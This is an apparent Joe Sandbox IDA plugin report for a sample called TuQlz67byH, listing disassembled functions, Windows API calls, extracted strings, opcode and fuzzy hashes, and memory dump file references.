Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 40f0e063838af908aa0c23a01ee66fead67f3bdac29e3056e6e3dd52480c6ad0
Instruction ID: 1ab1a7f85b930a8aeb28881d2d5021298126f01bf3d218249e48ff5f4aa595d6
Opcode Fuzzy Hash: 40f0e063838af908aa0c23a01ee66fead67f3bdac29e3056e6e3dd52480c6ad0
Instruction Fuzzy Hash: E6B12572E042499FDB158F78C881BEEBBB5EF55304F14516BE804BB381D2359E06CBA2

Function 00EC7922 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00EC792E
IsDebuggerPresent.KERNEL32 ref: 00EC79FA
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EC7A13
UnhandledExceptionFilter.KERNEL32(?), ref: 00EC7A1D

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 96d99cd869398a5b641d89833a8ee8078cefdaf7b8107f97cd79c44632fe3c71
Instruction ID: 19668507028baf66f4d651e777ccfbedc7a8e7b474497391e6bb85af183ddfc2
Opcode Fuzzy Hash: 96d99cd869398a5b641d89833a8ee8078cefdaf7b8107f97cd79c44632fe3c71
Instruction Fuzzy Hash: 4631F975D0521C9BDB20DFA5DA89BCDBBB8AF08304F1051EAE40CAB250EB719B858F45

Function 00EEE455 Relevance: 5.5, Strings: 4, Instructions: 458COMMON

Download Yara Rule

Strings

gfff, xrefs: 00EEF16F
-, xrefs: 00EEF0C5
gfff, xrefs: 00EEF1B9
gfff, xrefs: 00EEF0FE

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: -$gfff$gfff$gfff
API String ID: 0-3742897846
Opcode ID: 7718804b42ef8cf930431149c87fdc9c6f380754b2246168860b9e7f3cc38233
Instruction ID: dfd54b27f653940bebdce760902a56ace0c190a3feabed8ffd9b4c9c6d5bd763
Opcode Fuzzy Hash: 7718804b42ef8cf930431149c87fdc9c6f380754b2246168860b9e7f3cc38233
Instruction Fuzzy Hash: F8F1E571A087958FC718CE2AC49036ABBE2AFD5304F18DA3DE4D99B392D634D945CB42

Function 00F0F138 Relevance: 5.4, Strings: 4, Instructions: 383COMMON

Download Yara Rule

Strings

sj, xrefs: 00F0F1FF
lc, xrefs: 00F0F3DF
a|, xrefs: 00F0F1EF
hu, xrefs: 00F0F207

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: a|$hu$lc$sj
API String ID: 0-3748788050
Opcode ID: 2da6593b7bce017c5e70d307783f88ffe4697bf2d3fed1e3eddb71d2ace34cd3
Instruction ID: 1d8a12e322f665ad18436bf96503c125896608bef325c83605ffc778e8a04ab4
Opcode Fuzzy Hash: 2da6593b7bce017c5e70d307783f88ffe4697bf2d3fed1e3eddb71d2ace34cd3
Instruction Fuzzy Hash: D4A18DB4808340CBC720DF18C841A2BB7F0FF96764F548A1CE8D59B291E375D945EB96

Function 00EFCB78 Relevance: 5.4, Strings: 4, Instructions: 373COMMON

Download Yara Rule

Strings

t, xrefs: 00EFCB96
J|BJ, xrefs: 00EFCEE5
V, xrefs: 00EFCDB4
VY^_, xrefs: 00EFCCD7

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: J|BJ$V$VY^_$t
API String ID: 0-3701112211
Opcode ID: 43469e6f44eed1a9b836f895c9410751fc96af4312bcce639396a2a91bef0c87
Instruction ID: b9a947508eb0d939454b0300126e193b1a4b078175c0f328611db13d3835db0b
Opcode Fuzzy Hash: 43469e6f44eed1a9b836f895c9410751fc96af4312bcce639396a2a91bef0c87
Instruction Fuzzy Hash: 05D188B150C3889BD310DF14858062EFBE2AF96748F64582CF6C8AB252D736CD49DB96

Function 00F1A687 Relevance: 5.2, Strings: 4, Instructions: 213COMMON

Download Yara Rule

Strings

T>, xrefs: 00F1A85C
CV, xrefs: 00F1A863
KV, xrefs: 00F1A855
#', xrefs: 00F1A8C2

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: #'$CV$KV$T>
API String ID: 0-95592268
Opcode ID: c69b9ea6594a5c43ac04cb82c4969c9d22671953c70c58e81f226922327a0ad4
Instruction ID: 920cf152aded34b8cc54a41659f4bbc5da5d80b1c38c369cfb8bca918fff77ce
Opcode Fuzzy Hash: c69b9ea6594a5c43ac04cb82c4969c9d22671953c70c58e81f226922327a0ad4
Instruction Fuzzy Hash: A08154F4801B459BCB20DFA5C6851AEBFB1FF12300F60460CE486AB655C334AA95CBE3

Function 00F17B69 Relevance: 5.1, Strings: 4, Instructions: 80COMMON

Download Yara Rule

Strings

4c2a, xrefs: 00F17B81
lk, xrefs: 00F17B94
(g6e, xrefs: 00F17B79
,{*y, xrefs: 00F17BDF, 00F17BEB

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: (g6e$,{*y$4c2a$lk
API String ID: 0-1327526056
Opcode ID: f9dcc124c1b9a8638023c2dbdaf7777240da40c55f36b67bbdbdb3a86eb3612c
Instruction ID: 715eb4f81aa46aa0163ebff70cc6b4ba55d2718d4b4e2a1f774804822ba6f8b3
Opcode Fuzzy Hash: f9dcc124c1b9a8638023c2dbdaf7777240da40c55f36b67bbdbdb3a86eb3612c
Instruction Fuzzy Hash: 112179B480D3818AC730AF20C5007ABB7F0FF82741F64595DE8D89B264DB76C980DB96

Function 00EEE527 Relevance: 4.2, Strings: 3, Instructions: 472COMMON

Download Yara Rule

Strings

gfff, xrefs: 00EEEE2F
gfff, xrefs: 00EEEE14
+, xrefs: 00EEE44B

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: +$gfff$gfff
API String ID: 0-3646763964
Opcode ID: 35b728ad1705faf1f3b3f1732b5860e73b9f66d7c2269a3ae04d64dfcb9b7f2b
Instruction ID: f61892d1592e1c531b3340b511d823536ea99bd40dd11b13f6abe1d36c34cc6e
Opcode Fuzzy Hash: 35b728ad1705faf1f3b3f1732b5860e73b9f66d7c2269a3ae04d64dfcb9b7f2b
Instruction Fuzzy Hash: 75F1C33160C3858FC715CE2AC48426AFBE2AFD9308F189A6DE4D997356D334D948CB92

Function 00EEE27B Relevance: 4.1, Strings: 3, Instructions: 390COMMON

Download Yara Rule

Strings

gfff, xrefs: 00EEEE2F
-, xrefs: 00EEEDFB
gfff, xrefs: 00EEEE14

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: -$gfff$gfff
API String ID: 0-837351935
Opcode ID: d6ff6ad1442cbdf409bfd7bb2423588c0ae80e6daf78ca5f303bac0752b65028
Instruction ID: ba69b5031e5a79513a05aef5c2bcecc67318f9e3a1a9263e09ab89d69a932e68
Opcode Fuzzy Hash: d6ff6ad1442cbdf409bfd7bb2423588c0ae80e6daf78ca5f303bac0752b65028
Instruction Fuzzy Hash: 7BD1A13160C7858FC719CE29C48426AFBE2AFD9308F08CA6DE4D997356D734D949CB52

Function 00EF5468 Relevance: 4.1, Strings: 3, Instructions: 387COMMON

Download Yara Rule

Strings

), xrefs: 00EF54EE
IEND, xrefs: 00EF58C8
), xrefs: 00EF54E4

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: )$)$IEND
API String ID: 0-588110143
Opcode ID: 4c1adf4d3ddecd9b383167e0d128e5a9e29e2d1a0a5d0db94912750285bf625d
Instruction ID: ed36c8888d1204d292080eea4a038fadae1c4b0424a7b5c7953a975cff1dcd74
Opcode Fuzzy Hash: 4c1adf4d3ddecd9b383167e0d128e5a9e29e2d1a0a5d0db94912750285bf625d
Instruction Fuzzy Hash: 06E1F3B2A087059FD314CF29C88176ABBE0FBA5314F14592DF698A7381D7B5E914CBC2

Function 00F1FF74 Relevance: 4.0, Strings: 3, Instructions: 254COMMON

Download Yara Rule

Strings

LTDV, xrefs: 00F1FFE0
:, xrefs: 00F201B5
3<, xrefs: 00F201AE

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: 3<$:$LTDV
API String ID: 0-2797654093
Opcode ID: 9e7e827bec4cf70078eb32fa0fd477bc959d63c8314f3fba064201532e789eb4
Instruction ID: c510876a3d7d9fdaf541d04df8332c830f6aeee16c97fb9873ee5678e26dabef
Opcode Fuzzy Hash: 9e7e827bec4cf70078eb32fa0fd477bc959d63c8314f3fba064201532e789eb4
Instruction Fuzzy Hash: 3A7199704017918BDB618F24C590B26BBE1BF16300F98588CE8C68BA93C739F845DB65

Function 00F1FFD5 Relevance: 4.0, Strings: 3, Instructions: 243COMMON

Download Yara Rule

Strings

LTDV, xrefs: 00F1FFE0
:, xrefs: 00F201B5
3<, xrefs: 00F201AE

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: 3<$:$LTDV
API String ID: 0-2797654093
Opcode ID: 55370f4e5b9aebffe46f1c775ac834abbae90c9ef6c8401be1cb76cf2d82a942
Instruction ID: f9db6bc09270091a0d57833be8b6b173bc885696a81c35aadad4144612ba349d
Opcode Fuzzy Hash: 55370f4e5b9aebffe46f1c775ac834abbae90c9ef6c8401be1cb76cf2d82a942
Instruction Fuzzy Hash: 6261AA704017908BDB618F25D990B26BBF1BF17300F98588DE8C69FA93C739E815EB65

Function 00F1CF30 Relevance: 3.8, Strings: 3, Instructions: 67COMMON

Download Yara Rule

Strings

:, xrefs: 00F1CF5F
J\KR, xrefs: 00F1CF50
^XF^, xrefs: 00F1CF8B

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: :$J\KR$^XF^
API String ID: 0-4266130588
Opcode ID: 64bd0f38261b9b9006df79643b90736e476ce14dd74394cd61dbc2cb2afcfc2a
Instruction ID: bf18a4ade99ccd9045716e14b496aebfa34fdc72e66034950f34114c609a7fda
Opcode Fuzzy Hash: 64bd0f38261b9b9006df79643b90736e476ce14dd74394cd61dbc2cb2afcfc2a
Instruction Fuzzy Hash: FB21AF7140C3908BC312DF25C050BAAFBF2AF86760F184D5CE4E05B251C336D94BABA6

Function 00ED9ABF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

ji!^, xrefs: 00ED9B7E

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: ji!^
API String ID: 0-848646596
Opcode ID: c761b12454707ee31dcf6d7bdefc1476634a1133059bb94c791fbdba71b2faba
Instruction ID: 0f2ff7033ce86d5a967157a239d1d089464fd8a0c54e5a6c1589a4fbbe9e5953
Opcode Fuzzy Hash: c761b12454707ee31dcf6d7bdefc1476634a1133059bb94c791fbdba71b2faba
Instruction Fuzzy Hash: 05310B76900219AFCB20DFB9CCC5EBBB7BDEB84314F14415AF805A7345E630AE418B54

Function 00EDC6EB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00ED4EB1: GetLastError.KERNEL32(?,00000008,00ED9482), ref: 00ED4EB5
Part of subcall function 00ED4EB1: SetLastError.KERNEL32(00000000,00EEC480,00000024,00ED0419), ref: 00ED4F57

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00EDC73F

Strings

ji!^, xrefs: 00EDC6F6

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale
String ID: ji!^
API String ID: 3736152602-848646596
Opcode ID: 8b0a8adf4e520302a6026a92e75d78b3ab940b09f8ae1b7293ab810cc8c848b2
Instruction ID: d5b25d90c13093e96fd914f2ffb3c502b3027ec08342a00448594493e2a45aa0
Opcode Fuzzy Hash: 8b0a8adf4e520302a6026a92e75d78b3ab940b09f8ae1b7293ab810cc8c848b2
Instruction Fuzzy Hash: 09217172505207ABEB189E35DC41ABA77E8EF44354B20206BFD05E6281EB34DD46CB50

Function 00ED5D7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ECDDC1: EnterCriticalSection.KERNEL32(?,?,00ED4B89,?,00EEC2E0,00000008,00ED4D4D,?,00ECC446,?), ref: 00ECDDD0

EnumSystemLocalesW.KERNEL32(00ED5D72,00000001,00EEC3A0,0000000C,00ED6127,00000000), ref: 00ED5DB7

Strings

ji!^, xrefs: 00ED5DBF

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID: ji!^
API String ID: 1272433827-848646596
Opcode ID: b1344ff416c432c8ef4b20f5da3545a5560989a5722bbc760b10c25bf3a57a66
Instruction ID: 9080487c9e436c3bbfb22ce8855ff71c218a34884dd3a3980a55a1553086b44f
Opcode Fuzzy Hash: b1344ff416c432c8ef4b20f5da3545a5560989a5722bbc760b10c25bf3a57a66
Instruction Fuzzy Hash: F8F03C76A04304DFD700EF98E846B9D7BF1EB48721F10511AF411AB2A0C77599058F54

Function 00ED622B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00ED23AE,?,20001004,00000000,00000002,?,?,00ED19B0), ref: 00ED625F

Strings

R[, xrefs: 00ED624A

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: R[
API String ID: 2299586839-3972925902
Opcode ID: c5d6a76a03ef5465534c51d17bde605ce30c3cca3991bfbf404e33a640c8f7d0
Instruction ID: b219498e45af5676ab7eecdcc12cae99e082186b1aba1c535147c8d9ce4e7853
Opcode Fuzzy Hash: c5d6a76a03ef5465534c51d17bde605ce30c3cca3991bfbf404e33a640c8f7d0
Instruction Fuzzy Hash: A1E04F3250026CBBCF122F61DC08AAE7F6AEF44760F009016FD0576321DB728E26AA91

Function 00F30F18 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

f, xrefs: 00F310E4
%*+(, xrefs: 00F30F7C, 00F30F85

Memory Dump Source

Source File: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID:
String ID: %*+($f
API String ID: 0-2038831151
Opcode ID: 89d37b99ddcec098b1c0d00c9a8877e78529c77cf73c3d1d79a6a6d3dd0eea3c
Instruction ID: e99a2eb98d803700ba75ee7291beefeb2cc26ff073c74c47c48a597d1fd061a5
Opcode Fuzzy Hash: 89d37b99ddcec098b1c0d00c9a8877e78529c77cf73c3d1d79a6a6d3dd0eea3c
Instruction Fuzzy Hash: 97129BB1A083419FC715CF18C880B2EBBE5FBC9324F188A2DF4959B291D735E845DB92

Function 00ECCAF2 Relevance: 2.8, Strings: 2, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00ECCC80
ji!^, xrefs: 00ECCAFA

Memory Dump Source

Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
